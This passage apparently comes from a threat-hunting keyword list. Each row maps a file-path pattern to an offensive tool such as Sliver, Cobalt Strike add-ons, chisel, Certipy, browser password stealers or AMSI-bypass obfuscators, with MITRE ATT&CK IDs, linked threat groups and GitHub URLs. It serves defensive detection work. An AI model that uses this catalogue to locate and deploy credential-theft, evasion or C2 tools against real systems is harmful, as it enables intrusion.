T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*/C2Profiles/*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/C2script/*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*/C2Server.py*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/C2-Tool-Collection/*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*/cain.html*,offensive_tool_keyword,Cain&Abel,Cain & Able exploitation tool file ,T1075 - T1110 - T1071 - T1003 - T1555,TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/undergroundwires/CEH-in-bullet-points/blob/master/chapters/08-sniffing/sniffing-tools.md,1,1,N/A,N/A,8,743,233,2023-09-28T15:38:54Z,2021-05-11T12:38:17Z -*/campaign/*/implant/get_all*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*/canary.go,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/CandyPotato.cpp*,offensive_tool_keyword,CandyPotato,CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking,T1547.004,TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/CandyPotato,1,1,N/A,N/A,3,289,67,2021-09-16T17:08:52Z,2020-08-21T17:14:30Z -*/CandyPotato.sdf*,offensive_tool_keyword,CandyPotato,CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking,T1547.004,TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/CandyPotato,1,1,N/A,N/A,3,289,67,2021-09-16T17:08:52Z,2020-08-21T17:14:30Z -*/CandyPotato.sln*,offensive_tool_keyword,CandyPotato,CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking,T1547.004,TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/CandyPotato,1,1,N/A,N/A,3,289,67,2021-09-16T17:08:52Z,2020-08-21T17:14:30Z -*/CandyPotato.vcxproj*,offensive_tool_keyword,CandyPotato,CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking,T1547.004,TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/CandyPotato,1,1,N/A,N/A,3,289,67,2021-09-16T17:08:52Z,2020-08-21T17:14:30Z -*/CapBypass.ps1*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,0,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*/carlosevieira/Dirty-Pipe*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/carlosevieira/Dirty-Pipe,1,1,N/A,N/A,1,8,5,2022-03-07T21:01:15Z,2022-03-07T20:57:34Z -*/cassandra-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cassandra-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cc2_frp.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*/cccam-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cerbrutus*,offensive_tool_keyword,cerbrutus,Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Cerbrutus-BruteForcer/cerbrutus,1,1,N/A,N/A,3,290,42,2021-08-22T19:05:45Z,2021-07-07T19:11:40Z -*/Certipy.git*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,1,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*/Certipy/*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,1,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*/CertStealer*,offensive_tool_keyword,CertStealer,A .NET tool for exporting and importing certificates without touching disk.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/TheWover/CertStealer,1,1,N/A,N/A,5,450,67,2021-10-08T20:48:34Z,2021-04-21T14:20:56Z -*/certsync.git*,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,1,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*/cfn__resource_injection_lambda*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/ChainBuilder.py*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,1,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*/charlotte.cpp*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,1,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*/charlotte.py*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,1,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*/CheckPort.exe*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,1,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*/CheeseTools.git*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*/Chimera.git*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*/Chimera.git*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,1,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*/chimera.py*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*/chimera.sh*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*/chisel.exe*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chisel.git*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chisel@latest*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chisel-darwin_amd64*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chisel-freebsd*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chisel-linux_*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chisel-master*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chisel-windows_amd6*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*/chrisk44/*,offensive_tool_keyword,Github Username,Github username known for network exploitation tools,N/A,N/A,N/A,N/A,Network Exploitation tools,https://github.com/chrisk44/Hijacker,1,1,N/A,N/A,10,2213,435,2020-08-26T19:01:31Z,2016-11-25T01:39:07Z -*/chrome_decrypt.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*/ChromeDump/*,offensive_tool_keyword,chromedump,ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser,T1059.007 - T1114.001 - T1518.001 - T1552.002,TA0005 - TA0009 - TA0011,N/A,N/A,Credential Access,https://github.com/g4l4drim/ChromeDump,1,1,N/A,N/A,1,54,1,2023-06-30T09:07:59Z,2023-01-26T20:44:06Z -*/chromium_based_browsers.py*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,1,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*/cics-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cics-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cics-user-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cics-user-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/CIMplant.exe*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*/CIMplant.git*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*/CIMplant/Commander.cs*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*/citrix-brute-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/citrix-enum-apps.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/citrix-enum-apps-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/citrix-enum-servers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/citrix-enum-servers-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/clamav-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/clickme.docx*,offensive_tool_keyword,POC,CVE-2022-30190 Follina POC,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/onecloudemoji/CVE-2022-30190,1,1,N/A,N/A,2,107,33,2022-05-31T09:35:37Z,2022-05-31T06:45:25Z -*/client/beef.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/client/bof/*.asm*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*/Client/Commands/Enumeration.yaml*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/Client/Commands/Execution.yaml*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/Client/Commands/Injection.yaml*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/Client/Commands/Lateral.yaml*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/Client/Commands/Tokens.yaml*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/client/generated-stagers/*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/Client/Pages/Drones.razor*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/Client/Pages/Payloads.razor*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/Client/Pages/Pivots.razor*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/clipboardinject.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 